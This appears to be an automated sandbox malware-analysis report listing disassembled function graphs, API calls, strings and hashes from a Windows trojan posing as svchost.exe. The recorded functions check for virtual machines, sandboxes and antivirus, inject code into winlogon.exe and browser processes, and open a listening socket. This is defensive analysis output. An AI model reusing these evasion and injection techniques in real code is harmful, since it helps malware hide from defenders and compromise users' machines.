                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 607 402c10-402c42 LoadLibraryA GetModuleFileNameA call 403900 610 402c44-402c46 ExitProcess 607->610 611 402c4c-402c67 call 4020b0 call 401fc0 FindWindowA 607->611 616 402c81-402c9f call 402240 call 402330 call 402420 call 402560 IsUserAnAdmin 611->616 617 402c69-402c7b GetTickCount PostMessageA 611->617 626 402ca1-402ca8 call 401d80 616->626 627 402cc3-402cdb IsUserAnAdmin GetModuleHandleA 616->627 617->616 637 402cb2-402cb9 call 403440 626->637 638 402caa-402cac ExitProcess 626->638 629 402cfc-402d00 627->629 630 402cdd-402ced GetProcAddress 627->630 633 402d02-402d04 629->633 634 402d4e-402d50 629->634 630->629 632 402cef-402cf9 GetCurrentProcess 630->632 632->629 635 402d06-402d1a StrStrIA 633->635 636 402d1c-402d3a call 402810 GetCurrentProcessId call 401580 Sleep 633->636 639 402d56-402d6a StrStrIA 634->639 640 402ddd-402df6 call 402810 GlobalFindAtomA 634->640 635->636 641 402d3f-402d49 call 402950 call 4011c0 635->641 655 402e38-402e3a ExitProcess 636->655 637->627 658 402cbb-402cbd ExitProcess 637->658 645 402d81-402d94 call 402950 GlobalFindAtomA 639->645 646 402d6c-402d7c call 402810 call 4027b0 639->646 640->655 656 402df8-402e07 GlobalAddAtomA IsUserAnAdmin 640->656 641->655 662 402dd6-402ddb call 4011c0 645->662 663 402d96-402da5 GlobalAddAtomA IsUserAnAdmin 645->663 646->655 664 402e19-402e22 IsUserAnAdmin 656->664 665 402e09-402e11 656->665 662->655 669 402db7-402dc0 IsUserAnAdmin 663->669 670 402da7-402daf 663->670 671 402e24 664->671 672 402e29-402e31 call 4014b0 664->672 665->664 675 402dc2 669->675 676 402dc7-402dcf call 4014b0 669->676 670->669 671->672 672->655 681 402e33 call 401580 672->681 675->676 676->662 682 402dd1 call 401580 676->682 681->655 682->662
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                      • Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                      • Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                      • Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                      • Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402C46
                                                                                                                                                                                                                    • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402C69
                                                                                                                                                                                                                    • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 00402C9B
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402CAC
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                                    • String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$Pn7w$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                                    • API String ID: 3353599405-700788231
                                                                                                                                                                                                                    • Opcode ID: 3c08cf3795012a32fe98e21dd2af2de8b387599ae1b272b10eb404c49b26478c
                                                                                                                                                                                                                    • Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c08cf3795012a32fe98e21dd2af2de8b387599ae1b272b10eb404c49b26478c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD
                                                                                                                                                                                                                    Function 00403900 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 966 403900-403948 RegOpenKeyExA 967 40394a-40396d RegQueryValueExA 966->967 968 4039ad-4039e5 GetUserNameA CharUpperA strstr 966->968 971 40397b-40398c RegCloseKey 967->971 972 40396f-403979 RegCloseKey 967->972 969 403acb 968->969 970 4039eb-4039fe strstr 968->970 974 403acc-403ad2 969->974 970->969 973 403a04-403a17 strstr 970->973 971->968 975 40398e-403995 971->975 972->968 973->969 976 403a1d-403a5b GetSystemWindowsDirectoryA GetVolumeInformationA 973->976 975->968 977 403997-40399e 975->977 976->969 978 403a5d-403a62 976->978 977->968 979 4039a0-4039a7 977->979 978->969 980 403a64-403a69 978->980 979->968 979->974 980->969 981 403a6b-403a70 980->981 981->969 982 403a72-403a77 981->982 982->969 983 403a79-403aa3 GetModuleFileNameA StrStrIA 982->983 983->969 984 403aa5-403ab5 StrStrIA 983->984 984->969 985 403ab7-403ac7 StrStrIA 984->985 985->969 986 403ac9 985->986 986->969
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403973
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040397F
                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
                                                                                                                                                                                                                    • CharUpperA.USER32(?), ref: 004039C6
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039DE
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 004039F7
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 00403A10
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                                    • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                                    • API String ID: 1431998568-3499098167
                                                                                                                                                                                                                    • Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                                    • Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8
                                                                                                                                                                                                                    Function 02C888F0 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1018 2c888f0-2c8896a WSAStartup 1019 2c8896c-2c8896e ExitThread 1018->1019 1020 2c88974-2c88989 socket 1018->1020 1021 2c8898b-2c8898d ExitThread 1020->1021 1022 2c88993-2c889cd htons * 2 bind 1020->1022 1023 2c889cf-2c889d1 ExitThread 1022->1023 1024 2c889d7-2c889ea listen 1022->1024 1025 2c889ec-2c889ee ExitThread 1024->1025 1026 2c889f4-2c88a03 gethostname 1024->1026 1027 2c88a7b-2c88a93 accept 1026->1027 1028 2c88a05-2c88a14 gethostbyname 1026->1028 1029 2c88af4-2c88af6 ExitThread 1027->1029 1030 2c88a95-2c88aa9 getpeername 1027->1030 1028->1027 1031 2c88a16-2c88a1c 1028->1031 1033 2c88aab-2c88abb inet_ntoa htons 1030->1033 1034 2c88ac1-2c88ad7 CreateThread 1030->1034 1031->1027 1032 2c88a1e-2c88a22 1031->1032 1035 2c88a26-2c88a75 inet_ntoa 1032->1035 1033->1034 1036 2c88ad9-2c88af2 CloseHandle accept 1034->1036 1037 2c88afc-2c88b05 closesocket ExitThread 1034->1037 1035->1035 1038 2c88a77 1035->1038 1036->1029 1036->1030 1038->1027
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                                    • String ID: login$pass
                                                                                                                                                                                                                    • API String ID: 1705285421-2248183487
                                                                                                                                                                                                                    • Opcode ID: 0814016945f0639cc30ea48f27b4ddf5a410ef03c0ada2c7d2801af701cddf6e
                                                                                                                                                                                                                    • Instruction ID: f33e156e8bc8c7f92e80d3e6d955723e872460550b0affbafca1c6be28475b8d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0814016945f0639cc30ea48f27b4ddf5a410ef03c0ada2c7d2801af701cddf6e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D451AE75984340AFC302DF64E888B6ABBE8FF88724F448B1DF965972C0D7709519CB62
                                                                                                                                                                                                                    Function 02C864A0 Relevance: 40.8, APIs: 27, Instructions: 290memorytimesleepCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C86370: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
                                                                                                                                                                                                                      • Part of subcall function 02C86370: Process32First.KERNEL32(00000000,?), ref: 02C863A9
                                                                                                                                                                                                                      • Part of subcall function 02C86370: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
                                                                                                                                                                                                                      • Part of subcall function 02C86370: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
                                                                                                                                                                                                                      • Part of subcall function 02C86370: EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
                                                                                                                                                                                                                      • Part of subcall function 02C86370: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
                                                                                                                                                                                                                      • Part of subcall function 02C86370: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C86418
                                                                                                                                                                                                                      • Part of subcall function 02C86370: LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
                                                                                                                                                                                                                      • Part of subcall function 02C86370: Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
                                                                                                                                                                                                                      • Part of subcall function 02C86370: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
                                                                                                                                                                                                                      • Part of subcall function 02C86370: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485
                                                                                                                                                                                                                    • OpenProcess.KERNEL32 ref: 02C86510
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86534
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C86558
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8656A
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86575
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86594
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(?,00001400,?), ref: 02C86610
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86631
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,FFFFFFFF), ref: 02C86655
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C86667
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86672
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86698
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C866E6
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C86731
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD8A0,?,?), ref: 02C86770
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C8677A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C86781
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(?,00001400,?), ref: 02C867D0
                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C867F3
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(?,00001400), ref: 02C8681B
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02C8682D
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C8684D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8687A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C86881
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8688D
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C86894
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 02C868A0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CriticalHandleHeapSection$CloseEnterInformationLeave$OpenTimes$AllocProcess32QueryVirtual$CreateCurrentFirstFreeNextSleepSnapshotToolhelp32Validate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1045582906-0
                                                                                                                                                                                                                    • Opcode ID: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                                    • Instruction ID: c6614f8cda1026375bc89473445eaafcaf29e54397b90c84eaf1897da800079e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83C1E5B0948391AFD321DF65C884A5AFBE8BFC8B14F208A5EF59A87240D770D545CF92
                                                                                                                                                                                                                    Function 02C766D0 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 215memoryfilestringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,02C92BB9,75AF5CE0), ref: 02C7670B
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C76712
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7672A
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C76739
                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 02C76761
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocFileFindFirstProcesslstrcpynmemset
                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                    • API String ID: 2617121151-1173974218
                                                                                                                                                                                                                    • Opcode ID: d435bc3dfd38f8d086b800915070b61be572d68d174d0da329d797efcc14bdd8
                                                                                                                                                                                                                    • Instruction ID: 7becebad95b7428ba07262907e1d3278c4549d4a02366af0e28626690a94c87c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d435bc3dfd38f8d086b800915070b61be572d68d174d0da329d797efcc14bdd8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00616A71E447865BC7224F309C98BA77FADEF81754F244A54F9819B282DB31D60CC791
                                                                                                                                                                                                                    Function 00401580 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00401C70: memset.MSVCRT ref: 00401C96
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,76230F00,00000000,00000000), ref: 00401CA7
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetLastError.KERNEL32 ref: 00401CB0
                                                                                                                                                                                                                      • Part of subcall function 00401C70: SwitchToThread.KERNEL32 ref: 00401CBF
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401CC8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401CE8
                                                                                                                                                                                                                      • Part of subcall function 00401C70: CloseHandle.KERNEL32(00000000), ref: 00401CF9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015AD
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76D6DB30,00402E38,winlogon.exe), ref: 004015CC
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004015EB
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401601
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 0040160D
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401628
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401638
                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040167F
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 004016A1
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004016CD
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?), ref: 004016E8
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401703
                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401711
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,00406400,00050200,?), ref: 00401744
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401754
                                                                                                                                                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401766
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 0040177E
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040178F
                                                                                                                                                                                                                    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000), ref: 004017CC
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004017DD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3402365018.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                    • Opcode ID: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                                    • Instruction ID: c9964d6c084eb6c4e09adf0a78a82ba29cca963801df753bbce45d31a4150425
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2c1cff1cdf4c28cbaf7383b6b48f0421d485e879072eb787a5153b6e1db307
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5571A3B1600315ABE710DFA4DD89F6F77B8AF84B04F144029FA05B72D1E7B8994587AC
                                                                                                                                                                                                                    Function 02C93240 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 211injectionlibrarymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: memset.MSVCRT ref: 02C93B76
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,76230F00), ref: 02C93B87
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: GetLastError.KERNEL32 ref: 02C93B90
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: SwitchToThread.KERNEL32 ref: 02C93B9F
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02C93BA8
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93BC8
                                                                                                                                                                                                                      • Part of subcall function 02C93B50: CloseHandle.KERNEL32(00000000), ref: 02C93BD9
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02C9327F
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02C9329E
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932BD
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C932D3
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000), ref: 02C932DF
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C932FA
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C9330A
                                                                                                                                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02C93344
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02C93365
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02C93391
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,00003000,00000004), ref: 02C933A9
                                                                                                                                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02C933C4
                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02C933D2
                                                                                                                                                                                                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02C933FA
                                                                                                                                                                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C9340C
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93424
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C93435
                                                                                                                                                                                                                    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02C93456
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C93472
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C93483
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
